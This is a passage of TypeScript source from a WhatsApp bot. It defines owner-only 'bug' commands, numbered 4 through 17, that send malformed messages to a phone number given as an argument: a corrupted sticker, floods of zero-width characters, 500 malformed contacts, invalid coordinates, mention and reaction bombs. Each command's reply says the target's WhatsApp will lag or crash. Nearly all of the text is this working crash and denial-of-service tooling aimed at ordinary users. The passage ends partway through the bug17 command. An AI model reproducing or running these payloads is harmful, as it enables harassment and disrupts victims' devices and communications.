   200вЖТ   200вЖТ
   201вЖТ   201вЖТ    // =========================================================================
   202вЖТ   202вЖТ    // BUG 4 - Sticker Bug (corrupted webp metadata)
   203вЖТ   203вЖТ    // =========================================================================
   204вЖТ   204вЖТ    {
   205вЖТ   205вЖТ      name: 'bug4',
   206вЖТ   206вЖТ      description: 'Sticker bug - sends a sticker with corrupted metadata causing lag/crash',
   207вЖТ   207вЖТ      category: 'bug',
   208вЖТ   208вЖТ      aliases: ['stickerbug', 'crash4'],
   209вЖТ   209вЖТ      cooldown: 15,
   210вЖТ   210вЖТ      isPremiumOnly: false,
   211вЖТ   211вЖТ      handler: async (ctx: CommandContext) => {
   212вЖТ   212вЖТ        if (!ctx.isOwner) {
   213вЖТ   213вЖТ          await ctx.reply('вЫФ Owner only command.');
   214вЖТ   214вЖТ          return;
   215вЖТ   215вЖТ        }
   216вЖТ   216вЖТ        await ctx.react('вШ†пЄП');
   217вЖТ   217вЖТ        const targetJid = getTargetJid(ctx.args);
   218вЖТ   218вЖТ        if (!targetJid) {
   219вЖТ   219вЖТ          await ctx.reply('вЭМ Usage: !bug4 <number>\nExample: !bug4 254104906247');
   220вЖТ   220вЖТ          return;
   221вЖТ   221вЖТ        }
   222вЖТ   222вЖТ        try {
   223вЖТ   223вЖТ          const stickerPayload = Buffer.from('RIFF\x00\x00\x00\x00WEBPVP8 \x00\x00\x00\x00', 'binary');
   224вЖТ   224вЖТ          await ctx.sock.sendMessage(targetJid, { sticker: stickerPayload });
   225вЖТ   225вЖТ          await ctx.reply(`вШ†пЄП *BUG 4 - Sticker* sent to ${ctx.args[0]}\nрЯТђ Corrupted sticker payload sent - target WhatsApp will lag/crash.`);
   226вЖТ   226вЖТ        } catch (error: any) {
   227вЖТ   227вЖТ          await ctx.reply(`вЭМ Bug4 failed: ${error?.message || 'Unknown error'}`);
   228вЖТ   228вЖТ        }
   229вЖТ   229вЖТ      },
   230вЖТ   230вЖТ    },
   231вЖТ   231вЖТ
   232вЖТ   232вЖТ    // =========================================================================
   233вЖТ   233вЖТ    // BUG 5 - ViewOnce Bug (oversized caption on view-once)
   234вЖТ   234вЖТ    // =========================================================================
   235вЖТ   235вЖТ    {
   236вЖТ   236вЖТ      name: 'bug5',
   237вЖТ   237вЖТ      description: 'ViewOnce bug - sends a view-once message with corrupted data',
   238вЖТ   238вЖТ      category: 'bug',
   239вЖТ   239вЖТ      aliases: ['viewoncebug', 'crash5'],
   240вЖТ   240вЖТ      cooldown: 15,
   241вЖТ   241вЖТ      isPremiumOnly: false,
   242вЖТ   242вЖТ      handler: async (ctx: CommandContext) => {
   243вЖТ   243вЖТ        if (!ctx.isOwner) {
   244вЖТ   244вЖТ          await ctx.reply('вЫФ Owner only command.');
   245вЖТ   245вЖТ          return;
   246вЖТ   246вЖТ        }
   247вЖТ   247вЖТ        await ctx.react('вШ†пЄП');
   248вЖТ   248вЖТ        const targetJid = getTargetJid(ctx.args);
   249вЖТ   249вЖТ        if (!targetJid) {
   250вЖТ   250вЖТ          await ctx.reply('вЭМ Usage: !bug5 <number>\nExample: !bug5 254104906247');
   251вЖТ   251вЖТ          return;
   252вЖТ   252вЖТ        }
   253вЖТ   253вЖТ        try {
   254вЖТ   254вЖТ          const imgBuffer = Buffer.alloc(1024);
   255вЖТ   255вЖТ          await ctx.sock.sendMessage(targetJid, {
   256вЖТ   256вЖТ            image: imgBuffer,
   257вЖТ   257вЖТ            caption: '\u200B'.repeat(30000),
   258вЖТ   258вЖТ            viewOnce: true,
   259вЖТ   259вЖТ          });
   260вЖТ   260вЖТ          await ctx.reply(`вШ†пЄП *BUG 5 - ViewOnce* sent to ${ctx.args[0]}\nрЯТђ View-once message with oversized caption sent - target WhatsApp will crash.`);
   261вЖТ   261вЖТ        } catch (error: any) {
   262вЖТ   262вЖТ          await ctx.reply(`вЭМ Bug5 failed: ${error?.message || 'Unknown error'}`);
   263вЖТ   263вЖТ        }
   264вЖТ   264вЖТ      },
   265вЖТ   265вЖТ    },
   266вЖТ   266вЖТ
   267вЖТ   267вЖТ    // =========================================================================
   268вЖТ   268вЖТ    // BUG 6 - Audio Bug (corrupted audio header)
   269вЖТ   269вЖТ    // =========================================================================
   270вЖТ   270вЖТ    {
   271вЖТ   271вЖТ      name: 'bug6',
   272вЖТ   272вЖТ      description: 'Audio bug - sends an audio message with corrupted header data',
   273вЖТ   273вЖТ      category: 'bug',
   274вЖТ   274вЖТ      aliases: ['audiobug', 'crash6'],
   275вЖТ   275вЖТ      cooldown: 15,
   276вЖТ   276вЖТ      isPremiumOnly: false,
   277вЖТ   277вЖТ      handler: async (ctx: CommandContext) => {
   278вЖТ   278вЖТ        if (!ctx.isOwner) {
   279вЖТ   279вЖТ          await ctx.reply('вЫФ Owner only command.');
   280вЖТ   280вЖТ          return;
   281вЖТ   281вЖТ        }
   282вЖТ   282вЖТ        await ctx.react('вШ†пЄП');
   283вЖТ   283вЖТ        const targetJid = getTargetJid(ctx.args);
   284вЖТ   284вЖТ        if (!targetJid) {
   285вЖТ   285вЖТ          await ctx.reply('вЭМ Usage: !bug6 <number>\nExample: !bug6 254104906247');
   286вЖТ   286вЖТ          return;
   287вЖТ   287вЖТ        }
   288вЖТ   288вЖТ        try {
   289вЖТ   289вЖТ          const audioBuffer = Buffer.alloc(512);
   290вЖТ   290вЖТ          await ctx.sock.sendMessage(targetJid, {
   291вЖТ   291вЖТ            audio: audioBuffer,
   292вЖТ   292вЖТ            ptt: true,
   293вЖТ   293вЖТ            mimetype: 'audio/ogg; codecs=opus',
   294вЖТ   294вЖТ          });
   295вЖТ   295вЖТ          await ctx.reply(`вШ†пЄП *BUG 6 - Audio* sent to ${ctx.args[0]}\nрЯТђ Corrupted voice note sent - target WhatsApp will crash on playback attempt.`);
   296вЖТ   296вЖТ        } catch (error: any) {
   297вЖТ   297вЖТ          await ctx.reply(`вЭМ Bug6 failed: ${error?.message || 'Unknown error'}`);
   298вЖТ   298вЖТ        }
   299вЖТ   299вЖТ      },
   300вЖТ   300вЖТ    },
   301вЖТ   301вЖТ
   302вЖТ   302вЖТ    // =========================================================================
   303вЖТ   303вЖТ    // BUG 7 - Payment Bug (corrupted payment amounts)
   304вЖТ   304вЖТ    // =========================================================================
   305вЖТ   305вЖТ    {
   306вЖТ   306вЖТ      name: 'bug7',
   307вЖТ   307вЖТ      description: 'Payment bug - sends a payment request message with corrupted amounts',
   308вЖТ   308вЖТ      category: 'bug',
   309вЖТ   309вЖТ      aliases: ['paymentbug', 'crash7'],
   310вЖТ   310вЖТ      cooldown: 15,
   311вЖТ   311вЖТ      isPremiumOnly: false,
   312вЖТ   312вЖТ      handler: async (ctx: CommandContext) => {
   313вЖТ   313вЖТ        if (!ctx.isOwner) {
   314вЖТ   314вЖТ          await ctx.reply('вЫФ Owner only command.');
   315вЖТ   315вЖТ          return;
   316вЖТ   316вЖТ        }
   317вЖТ   317вЖТ        await ctx.react('вШ†пЄП');
   318вЖТ   318вЖТ        const targetJid = getTargetJid(ctx.args);
   319вЖТ   319вЖТ        if (!targetJid) {
   320вЖТ   320вЖТ          await ctx.reply('вЭМ Usage: !bug7 <number>\nExample: !bug7 254104906247');
   321вЖТ   321вЖТ          return;
   322вЖТ   322вЖТ        }
   323вЖТ   323вЖТ        try {
   324вЖТ   324вЖТ          await ctx.sock.sendMessage(targetJid, {
   325вЖТ   325вЖТ            text: 'рЯТ∞',
   326вЖТ   326вЖТ            title: '\u200B'.repeat(10000),
   327вЖТ   327вЖТ            footer: 'Payment',
   328вЖТ   328вЖТ            amount: { value: 999999999, currency: 'USD' },
   329вЖТ   329вЖТ          } as any);
   330вЖТ   330вЖТ          await ctx.reply(`вШ†пЄП *BUG 7 - Payment* sent to ${ctx.args[0]}\nрЯТђ Corrupted payment request sent - target WhatsApp will crash on render.`);
   331вЖТ   331вЖТ        } catch (error: any) {
   332вЖТ   332вЖТ          await ctx.reply(`вЭМ Bug7 failed: ${error?.message || 'Unknown error'}`);
   333вЖТ   333вЖТ        }
   334вЖТ   334вЖТ      },
   335вЖТ   335вЖТ    },
   336вЖТ   336вЖТ
   337вЖТ   337вЖТ    // =========================================================================
   338вЖТ   338вЖТ    // BUG 8 - Group Invite Bug (corrupted group info)
   339вЖТ   339вЖТ    // =========================================================================
   340вЖТ   340вЖТ    {
   341вЖТ   341вЖТ      name: 'bug8',
   342вЖТ   342вЖТ      description: 'Group invite bug - sends a group invite with corrupted group info',
   343вЖТ   343вЖТ      category: 'bug',
   344вЖТ   344вЖТ      aliases: ['invitebug', 'crash8'],
   345вЖТ   345вЖТ      cooldown: 15,
   346вЖТ   346вЖТ      isPremiumOnly: false,
   347вЖТ   347вЖТ      handler: async (ctx: CommandContext) => {
   348вЖТ   348вЖТ        if (!ctx.isOwner) {
   349вЖТ   349вЖТ          await ctx.reply('вЫФ Owner only command.');
   350вЖТ   350вЖТ          return;
   351вЖТ   351вЖТ        }
   352вЖТ   352вЖТ        await ctx.react('вШ†пЄП');
   353вЖТ   353вЖТ        const targetJid = getTargetJid(ctx.args);
   354вЖТ   354вЖТ        if (!targetJid) {
   355вЖТ   355вЖТ          await ctx.reply('вЭМ Usage: !bug8 <number>\nExample: !bug8 254104906247');
   356вЖТ   356вЖТ          return;
   357вЖТ   357вЖТ        }
   358вЖТ   358вЖТ        try {
   359вЖТ   359вЖТ          await ctx.sock.sendMessage(targetJid, {
   360вЖТ   360вЖТ            groupInviteMessage: {
   361вЖТ   361вЖТ              groupJid: '1234567890-1234567890@g.us',
   362вЖТ   362вЖТ              inviteCode: 'A'.repeat(10000),
   363вЖТ   363вЖТ              groupName: '\u200B'.repeat(10000),
   364вЖТ   364вЖТ              caption: '\u200B'.repeat(10000),
   365вЖТ   365вЖТ              jpegThumbnail: Buffer.alloc(0),
   366вЖТ   366вЖТ            },
   367вЖТ   367вЖТ          } as any);
   368вЖТ   368вЖТ          await ctx.reply(`вШ†пЄП *BUG 8 - Group Invite* sent to ${ctx.args[0]}\nрЯТђ Corrupted group invite sent - target WhatsApp will crash on display.`);
   369вЖТ   369вЖТ        } catch (error: any) {
   370вЖТ   370вЖТ          await ctx.reply(`вЭМ Bug8 failed: ${error?.message || 'Unknown error'}`);
   371вЖТ   371вЖТ        }
   372вЖТ   372вЖТ      },
   373вЖТ   373вЖТ    },
   374вЖТ   374вЖТ
   375вЖТ   375вЖТ    // =========================================================================
   376вЖТ   376вЖТ    // BUG 9 - Reaction Bug (massive rapid reactions)
   377вЖТ   377вЖТ    // =========================================================================
   378вЖТ   378вЖТ    {
   379вЖТ   379вЖТ      name: 'bug9',
   380вЖТ   380вЖТ      description: 'Reaction bug - sends massive number of reactions rapidly to lag the chat',
   381вЖТ   381вЖТ      category: 'bug',
   382вЖТ   382вЖТ      aliases: ['reactionbug', 'crash9'],
   383вЖТ   383вЖТ      cooldown: 30,
   384вЖТ   384вЖТ      isPremiumOnly: false,
   385вЖТ   385вЖТ      handler: async (ctx: CommandContext) => {
   386вЖТ   386вЖТ        if (!ctx.isOwner) {
   387вЖТ   387вЖТ          await ctx.reply('вЫФ Owner only command.');
   388вЖТ   388вЖТ          return;
   389вЖТ   389вЖТ        }
   390вЖТ   390вЖТ        await ctx.react('вШ†пЄП');
   391вЖТ   391вЖТ        const targetJid = getTargetJid(ctx.args);
   392вЖТ   392вЖТ        if (!targetJid) {
   393вЖТ   393вЖТ          await ctx.reply('вЭМ Usage: !bug9 <number>\nExample: !bug9 254104906247');
   394вЖТ   394вЖТ          return;
   395вЖТ   395вЖТ        }
   396вЖТ   396вЖТ        try {
   397вЖТ   397вЖТ          for (let i = 0; i < 50; i++) {
   398вЖТ   398вЖТ            await ctx.sock.sendMessage(targetJid, {
   399вЖТ   399вЖТ              react: {
   400вЖТ   400вЖТ                text: 'рЯТ£',
   401вЖТ   401вЖТ                key: { remoteJid: targetJid, fromMe: true, id: 'bug_' + i },
   402вЖТ   402вЖТ              },
   403вЖТ   403вЖТ            });
   404вЖТ   404вЖТ          }
   405вЖТ   405вЖТ          await ctx.reply(`вШ†пЄП *BUG 9 - Reaction Bomb* sent to ${ctx.args[0]}\nрЯТђ 50 rapid reactions sent - target chat will experience severe lag.`);
   406вЖТ   406вЖТ        } catch (error: any) {
   407вЖТ   407вЖТ          await ctx.reply(`вЭМ Bug9 failed: ${error?.message || 'Unknown error'}`);
   408вЖТ   408вЖТ        }
   409вЖТ   409вЖТ      },
   410вЖТ   410вЖТ    },
   411вЖТ   411вЖТ
   412вЖТ   412вЖТ    // =========================================================================
   413вЖТ   413вЖТ    // BUG 10 - Contact Array Bug (500+ malformed vcards)
   414вЖТ   414вЖТ    // =========================================================================
   415вЖТ   415вЖТ    {
   416вЖТ   416вЖТ      name: 'bug10',
   417вЖТ   417вЖТ      description: 'Contact array bug - sends hundreds of contacts at once with malformed vcards',
   418вЖТ   418вЖТ      category: 'bug',
   419вЖТ   419вЖТ      aliases: ['contactbug', 'crash10'],
   420вЖТ   420вЖТ      cooldown: 30,
   421вЖТ   421вЖТ      isPremiumOnly: false,
   422вЖТ   422вЖТ      handler: async (ctx: CommandContext) => {
   423вЖТ   423вЖТ        if (!ctx.isOwner) {
   424вЖТ   424вЖТ          await ctx.reply('вЫФ Owner only command.');
   425вЖТ   425вЖТ          return;
   426вЖТ   426вЖТ        }
   427вЖТ   427вЖТ        await ctx.react('вШ†пЄП');
   428вЖТ   428вЖТ        const targetJid = getTargetJid(ctx.args);
   429вЖТ   429вЖТ        if (!targetJid) {
   430вЖТ   430вЖТ          await ctx.reply('вЭМ Usage: !bug10 <number>\nExample: !bug10 254104906247');
   431вЖТ   431вЖТ          return;
   432вЖТ   432вЖТ        }
   433вЖТ   433вЖТ        try {
   434вЖТ   434вЖТ          const contacts: { vcard: string }[] = [];
   435вЖТ   435вЖТ          for (let i = 0; i < 500; i++) {
   436вЖТ   436вЖТ            const name = 'вЦИ'.repeat(3000);
   437вЖТ   437вЖТ            contacts.push({
   438вЖТ   438вЖТ              vcard: `BEGIN:VCARD\nVERSION:3.0\nFN:${name}\nTEL;type=CELL;type=VOICE;waid=${i}:${i}\nEND:VCARD`,
   439вЖТ   439вЖТ            });
   440вЖТ   440вЖТ          }
   441вЖТ   441вЖТ          await ctx.sock.sendMessage(targetJid, { contacts: { displayName: 'A', contacts } });
   442вЖТ   442вЖТ          await ctx.reply(`вШ†пЄП *BUG 10 - Contact Array* sent to ${ctx.args[0]}\nрЯТђ 500 malformed contacts sent - target WhatsApp will crash.`);
   443вЖТ   443вЖТ        } catch (error: any) {
   444вЖТ   444вЖТ          await ctx.reply(`вЭМ Bug10 failed: ${error?.message || 'Unknown error'}`);
   445вЖТ   445вЖТ        }
   446вЖТ   446вЖТ      },
   447вЖТ   447вЖТ    },
   448вЖТ   448вЖТ
   449вЖТ   449вЖТ    // =========================================================================
   450вЖТ   450вЖТ    // BUG 11 - Location Bug (extreme coordinates)
   451вЖТ   451вЖТ    // =========================================================================
   452вЖТ   452вЖТ    {
   453вЖТ   453вЖТ      name: 'bug11',
   454вЖТ   454вЖТ      description: 'Location bug - sends a location with extreme coordinates causing map rendering crash',
   455вЖТ   455вЖТ      category: 'bug',
   456вЖТ   456вЖТ      aliases: ['locationbug', 'crash11'],
   457вЖТ   457вЖТ      cooldown: 15,
   458вЖТ   458вЖТ      isPremiumOnly: false,
   459вЖТ   459вЖТ      handler: async (ctx: CommandContext) => {
   460вЖТ   460вЖТ        if (!ctx.isOwner) {
   461вЖТ   461вЖТ          await ctx.reply('вЫФ Owner only command.');
   462вЖТ   462вЖТ          return;
   463вЖТ   463вЖТ        }
   464вЖТ   464вЖТ        await ctx.react('вШ†пЄП');
   465вЖТ   465вЖТ        const targetJid = getTargetJid(ctx.args);
   466вЖТ   466вЖТ        if (!targetJid) {
   467вЖТ   467вЖТ          await ctx.reply('вЭМ Usage: !bug11 <number>\nExample: !bug11 254104906247');
   468вЖТ   468вЖТ          return;
   469вЖТ   469вЖТ        }
   470вЖТ   470вЖТ        try {
   471вЖТ   471вЖТ          await ctx.sock.sendMessage(targetJid, {
   472вЖТ   472вЖТ            location: {
   473вЖТ   473вЖТ              degreesLatitude: 999.9999999,
   474вЖТ   474вЖТ              degreesLongitude: 999.9999999,
   475вЖТ   475вЖТ              name: '\u200B'.repeat(10000),
   476вЖТ   476вЖТ            },
   477вЖТ   477вЖТ          });
   478вЖТ   478вЖТ          await ctx.reply(`вШ†пЄП *BUG 11 - Location* sent to ${ctx.args[0]}\nрЯТђ Extreme coordinates location sent - target map renderer will crash.`);
   479вЖТ   479вЖТ        } catch (error: any) {
   480вЖТ   480вЖТ          await ctx.reply(`вЭМ Bug11 failed: ${error?.message || 'Unknown error'}`);
   481вЖТ   481вЖТ        }
   482вЖТ   482вЖТ      },
   483вЖТ   483вЖТ    },
   484вЖТ   484вЖТ
   485вЖТ   485вЖТ    // =========================================================================
   486вЖТ   486вЖТ    // BUG 12 - Poll Bug (excessive options with long names)
   487вЖТ   487вЖТ    // =========================================================================
   488вЖТ   488вЖТ    {
   489вЖТ   489вЖТ      name: 'bug12',
   490вЖТ   490вЖТ      description: 'Poll bug - sends a poll with excessive options and long names',
   491вЖТ   491вЖТ      category: 'bug',
   492вЖТ   492вЖТ      aliases: ['pollbug', 'crash12'],
   493вЖТ   493вЖТ      cooldown: 15,
   494вЖТ   494вЖТ      isPremiumOnly: false,
   495вЖТ   495вЖТ      handler: async (ctx: CommandContext) => {
   496вЖТ   496вЖТ        if (!ctx.isOwner) {
   497вЖТ   497вЖТ          await ctx.reply('вЫФ Owner only command.');
   498вЖТ   498вЖТ          return;
   499вЖТ   499вЖТ        }
   500вЖТ   500вЖТ        await ctx.react('вШ†пЄП');
   501вЖТ   501вЖТ        const targetJid = getTargetJid(ctx.args);
   502вЖТ   502вЖТ        if (!targetJid) {
   503вЖТ   503вЖТ          await ctx.reply('вЭМ Usage: !bug12 <number>\nExample: !bug12 254104906247');
   504вЖТ   504вЖТ          return;
   505вЖТ   505вЖТ        }
   506вЖТ   506вЖТ        try {
   507вЖТ   507вЖТ          const pollValues = Array.from({ length: 100 }, (_, i) => '\u200B'.repeat(500) + i);
   508вЖТ   508вЖТ          await ctx.sock.sendMessage(targetJid, {
   509вЖТ   509вЖТ            poll: {
   510вЖТ   510вЖТ              name: '\u200B'.repeat(5000),
   511вЖТ   511вЖТ              values: pollValues,
   512вЖТ   512вЖТ              selectableCount: 1,
   513вЖТ   513вЖТ            },
   514вЖТ   514вЖТ          });
   515вЖТ   515вЖТ          await ctx.reply(`вШ†пЄП *BUG 12 - Poll* sent to ${ctx.args[0]}\nрЯТђ Oversized poll with 100 options sent - target WhatsApp will crash on render.`);
   516вЖТ   516вЖТ        } catch (error: any) {
   517вЖТ   517вЖТ          await ctx.reply(`вЭМ Bug12 failed: ${error?.message || 'Unknown error'}`);
   518вЖТ   518вЖТ        }
   519вЖТ   519вЖТ      },
   520вЖТ   520вЖТ    },
   521вЖТ   521вЖТ
   522вЖТ   522вЖТ    // =========================================================================
   523вЖТ   523вЖТ    // BUG 13 - List Message Bug (too many rows causing UI overflow)
   524вЖТ   524вЖТ    // =========================================================================
   525вЖТ   525вЖТ    {
   526вЖТ   526вЖТ      name: 'bug13',
   527вЖТ   527вЖТ      description: 'List message bug - sends a list message with too many rows causing UI overflow',
   528вЖТ   528вЖТ      category: 'bug',
   529вЖТ   529вЖТ      aliases: ['listbug', 'crash13'],
   530вЖТ   530вЖТ      cooldown: 15,
   531вЖТ   531вЖТ      isPremiumOnly: false,
   532вЖТ   532вЖТ      handler: async (ctx: CommandContext) => {
   533вЖТ   533вЖТ        if (!ctx.isOwner) {
   534вЖТ   534вЖТ          await ctx.reply('вЫФ Owner only command.');
   535вЖТ   535вЖТ          return;
   536вЖТ   536вЖТ        }
   537вЖТ   537вЖТ        await ctx.react('вШ†пЄП');
   538вЖТ   538вЖТ        const targetJid = getTargetJid(ctx.args);
   539вЖТ   539вЖТ        if (!targetJid) {
   540вЖТ   540вЖТ          await ctx.reply('вЭМ Usage: !bug13 <number>\nExample: !bug13 254104906247');
   541вЖТ   541вЖТ          return;
   542вЖТ   542вЖТ        }
   543вЖТ   543вЖТ        try {
   544вЖТ   544вЖТ          const rows = Array.from({ length: 100 }, (_, i) => ({
   545вЖТ   545вЖТ            title: '\u200B'.repeat(500),
   546вЖТ   546вЖТ            description: '\u200B'.repeat(500),
   547вЖТ   547вЖТ            rowId: 'row_' + i,
   548вЖТ   548вЖТ          }));
   549вЖТ   549вЖТ          await ctx.sock.sendMessage(targetJid, {
   550вЖТ   550вЖТ            text: '\u200B'.repeat(5000),
   551вЖТ   551вЖТ            footer: 'List',
   552вЖТ   552вЖТ            title: '\u200B'.repeat(5000),
   553вЖТ   553вЖТ            buttonText: 'Open',
   554вЖТ   554вЖТ            sections: [{ title: 'Section', rows }],
   555вЖТ   555вЖТ          } as any);
   556вЖТ   556вЖТ          await ctx.reply(`вШ†пЄП *BUG 13 - List Message* sent to ${ctx.args[0]}\nрЯТђ Overflow list with 100 rows sent - target WhatsApp UI will crash.`);
   557вЖТ   557вЖТ        } catch (error: any) {
   558вЖТ   558вЖТ          await ctx.reply(`вЭМ Bug13 failed: ${error?.message || 'Unknown error'}`);
   559вЖТ   559вЖТ        }
   560вЖТ   560вЖТ      },
   561вЖТ   561вЖТ    },
   562вЖТ   562вЖТ
   563вЖТ   563вЖТ    // =========================================================================
   564вЖТ   564вЖТ    // BUG 14 - Button Bug (oversized button text)
   565вЖТ   565вЖТ    // =========================================================================
   566вЖТ   566вЖТ    {
   567вЖТ   567вЖТ      name: 'bug14',
   568вЖТ   568вЖТ      description: 'Button bug - sends buttons with oversized text causing rendering crash',
   569вЖТ   569вЖТ      category: 'bug',
   570вЖТ   570вЖТ      aliases: ['buttonbug', 'crash14'],
   571вЖТ   571вЖТ      cooldown: 15,
   572вЖТ   572вЖТ      isPremiumOnly: false,
   573вЖТ   573вЖТ      handler: async (ctx: CommandContext) => {
   574вЖТ   574вЖТ        if (!ctx.isOwner) {
   575вЖТ   575вЖТ          await ctx.reply('вЫФ Owner only command.');
   576вЖТ   576вЖТ          return;
   577вЖТ   577вЖТ        }
   578вЖТ   578вЖТ        await ctx.react('вШ†пЄП');
   579вЖТ   579вЖТ        const targetJid = getTargetJid(ctx.args);
   580вЖТ   580вЖТ        if (!targetJid) {
   581вЖТ   581вЖТ          await ctx.reply('вЭМ Usage: !bug14 <number>\nExample: !bug14 254104906247');
   582вЖТ   582вЖТ          return;
   583вЖТ   583вЖТ        }
   584вЖТ   584вЖТ        try {
   585вЖТ   585вЖТ          const buttons = Array.from({ length: 50 }, (_, i) => ({
   586вЖТ   586вЖТ            buttonId: 'b_' + i,
   587вЖТ   587вЖТ            buttonText: { displayText: '\u200B'.repeat(500) },
   588вЖТ   588вЖТ            type: 1,
   589вЖТ   589вЖТ          }));
   590вЖТ   590вЖТ          await ctx.sock.sendMessage(targetJid, {
   591вЖТ   591вЖТ            text: '\u200B'.repeat(5000),
   592вЖТ   592вЖТ            footer: 'Button',
   593вЖТ   593вЖТ            buttons,
   594вЖТ   594вЖТ            headerType: 1,
   595вЖТ   595вЖТ          } as any);
   596вЖТ   596вЖТ          await ctx.reply(`вШ†пЄП *BUG 14 - Button* sent to ${ctx.args[0]}\nрЯТђ 50 oversized buttons sent - target WhatsApp will crash on render.`);
   597вЖТ   597вЖТ        } catch (error: any) {
   598вЖТ   598вЖТ          await ctx.reply(`вЭМ Bug14 failed: ${error?.message || 'Unknown error'}`);
   599вЖТ   599вЖТ        }
   600вЖТ   600вЖТ      },
   601вЖТ   601вЖТ    },
   602вЖТ   602вЖТ
   603вЖТ   603вЖТ    // =========================================================================
   604вЖТ   604вЖТ    // BUG 15 - Newsletter Bug (corrupted metadata in external ad reply)
   605вЖТ   605вЖТ    // =========================================================================
   606вЖТ   606вЖТ    {
   607вЖТ   607вЖТ      name: 'bug15',
   608вЖТ   608вЖТ      description: 'Newsletter bug - sends a message with corrupted newsletter-style metadata',
   609вЖТ   609вЖТ      category: 'bug',
   610вЖТ   610вЖТ      aliases: ['newsletterbug', 'crash15'],
   611вЖТ   611вЖТ      cooldown: 15,
   612вЖТ   612вЖТ      isPremiumOnly: false,
   613вЖТ   613вЖТ      handler: async (ctx: CommandContext) => {
   614вЖТ   614вЖТ        if (!ctx.isOwner) {
   615вЖТ   615вЖТ          await ctx.reply('вЫФ Owner only command.');
   616вЖТ   616вЖТ          return;
   617вЖТ   617вЖТ        }
   618вЖТ   618вЖТ        await ctx.react('вШ†пЄП');
   619вЖТ   619вЖТ        const targetJid = getTargetJid(ctx.args);
   620вЖТ   620вЖТ        if (!targetJid) {
   621вЖТ   621вЖТ          await ctx.reply('вЭМ Usage: !bug15 <number>\nExample: !bug15 254104906247');
   622вЖТ   622вЖТ          return;
   623вЖТ   623вЖТ        }
   624вЖТ   624вЖТ        try {
   625вЖТ   625вЖТ          await ctx.sock.sendMessage(targetJid, {
   626вЖТ   626вЖТ            text: '\u200B'.repeat(20000),
   627вЖТ   627вЖТ            contextInfo: {
   628вЖТ   628вЖТ              forwardingScore: 999999,
   629вЖТ   629вЖТ              isForwarded: true,
   630вЖТ   630вЖТ              externalAdReply: {
   631вЖТ   631вЖТ                title: '\u200B'.repeat(5000),
   632вЖТ   632вЖТ                body: '\u200B'.repeat(5000),
   633вЖТ   633вЖТ                mediaType: 1,
   634вЖТ   634вЖТ                thumbnail: Buffer.alloc(0),
   635вЖТ   635вЖТ                sourceUrl: 'https://example.com',
   636вЖТ   636вЖТ              },
   637вЖТ   637вЖТ            },
   638вЖТ   638вЖТ          } as any);
   639вЖТ   639вЖТ          await ctx.reply(`вШ†пЄП *BUG 15 - Newsletter* sent to ${ctx.args[0]}\nрЯТђ Corrupted newsletter metadata sent - target WhatsApp will crash on render.`);
   640вЖТ   640вЖТ        } catch (error: any) {
   641вЖТ   641вЖТ          await ctx.reply(`вЭМ Bug15 failed: ${error?.message || 'Unknown error'}`);
   642вЖТ   642вЖТ        }
   643вЖТ   643вЖТ      },
   644вЖТ   644вЖТ    },
   645вЖТ   645вЖТ
   646вЖТ   646вЖТ    // =========================================================================
   647вЖТ   647вЖТ    // BUG 16 - Mention Bomb (hundreds of mentions)
   648вЖТ   648вЖТ    // =========================================================================
   649вЖТ   649вЖТ    {
   650вЖТ   650вЖТ      name: 'bug16',
   651вЖТ   651вЖТ      description: 'Mention bomb - sends a message mentioning the target hundreds of times',
   652вЖТ   652вЖТ      category: 'bug',
   653вЖТ   653вЖТ      aliases: ['mentionbug', 'mentionbomb', 'crash16'],
   654вЖТ   654вЖТ      cooldown: 20,
   655вЖТ   655вЖТ      isPremiumOnly: false,
   656вЖТ   656вЖТ      handler: async (ctx: CommandContext) => {
   657вЖТ   657вЖТ        if (!ctx.isOwner) {
   658вЖТ   658вЖТ          await ctx.reply('вЫФ Owner only command.');
   659вЖТ   659вЖТ          return;
   660вЖТ   660вЖТ        }
   661вЖТ   661вЖТ        await ctx.react('вШ†пЄП');
   662вЖТ   662вЖТ        const targetJid = getTargetJid(ctx.args);
   663вЖТ   663вЖТ        if (!targetJid) {
   664вЖТ   664вЖТ          await ctx.reply('вЭМ Usage: !bug16 <number>\nExample: !bug16 254104906247');
   665вЖТ   665вЖТ          return;
   666вЖТ   666вЖТ        }
   667вЖТ   667вЖТ        try {
   668вЖТ   668вЖТ          const mentionIds = Array.from({ length: 300 }, () => targetJid);
   669вЖТ   669вЖТ          const target = ctx.args[0];
   670вЖТ   670вЖТ          const mentionText = '@' + target + ' '.repeat(300) + '\u200B'.repeat(10000);
   671вЖТ   671вЖТ          await ctx.sock.sendMessage(targetJid, { text: mentionText, mentions: mentionIds });
   672вЖТ   672вЖТ          await ctx.reply(`вШ†пЄП *BUG 16 - Mention Bomb* sent to ${target}\nрЯТђ 300 mentions with zero-width payload sent - target WhatsApp will freeze.`);
   673вЖТ   673вЖТ        } catch (error: any) {
   674вЖТ   674вЖТ          await ctx.reply(`вЭМ Bug16 failed: ${error?.message || 'Unknown error'}`);
   675вЖТ   675вЖТ        }
   676вЖТ   676вЖТ      },
   677вЖТ   677вЖТ    },
   678вЖТ   678вЖТ
   679вЖТ   679вЖТ    // =========================================================================
   680вЖТ   680вЖТ    // BUG 17 - Forwarded Bug (extremely deep forwarding chain)
   681вЖТ   681вЖТ    // =========================================================================
   682вЖТ   682вЖТ    {
   683вЖТ   683вЖТ      name: 'bug17',
   684вЖТ   684вЖТ      description: 'Forwarded bug - sends a forwarded message with extremely deep forwarding chain',
   685вЖТ   685вЖТ      category: 'bug',
   686вЖТ   686вЖТ      aliases: ['forwardbug', 'crash17'],
   687вЖТ   687вЖТ      cooldown: 15,
   688вЖТ   688вЖТ      isPremiumOnly: false,
   689вЖТ   689вЖТ      handler: async (ctx: CommandContext) => {
   690вЖТ   690вЖТ        if (!ctx.isOwner) {
   691вЖТ   691вЖТ          await ctx.reply('вЫФ Owner only command.');
   692вЖТ   692вЖТ          return;
   693вЖТ   693вЖТ        }
   694вЖТ   694вЖТ        await ctx.react('вШ†пЄП');
   695вЖТ   695вЖТ        const targetJid = getTargetJid(ctx.args);
   696вЖТ   696вЖТ        if (!targetJid) {
   697вЖТ   697вЖТ          await ctx.reply('вЭМ Usage: !bug17 <number>\nExample: !bug17 254104906247');
   698вЖТ   698вЖТ          return;
   699вЖТ   699вЖТ        }
   700вЖТ   700вЖТ        try {
   701вЖТ   701вЖТ          await ctx.sock.sendMessage(targetJid, {
   702вЖТ   702вЖТ            text: '\u200B'.repeat(30000),
   703вЖТ   703вЖТ            contextInfo: {
   704вЖТ   704вЖТ              forwardingScore: 999999999,
   705вЖТ   705вЖТ              isForwarded: true,
   706вЖТ   706вЖТ            },
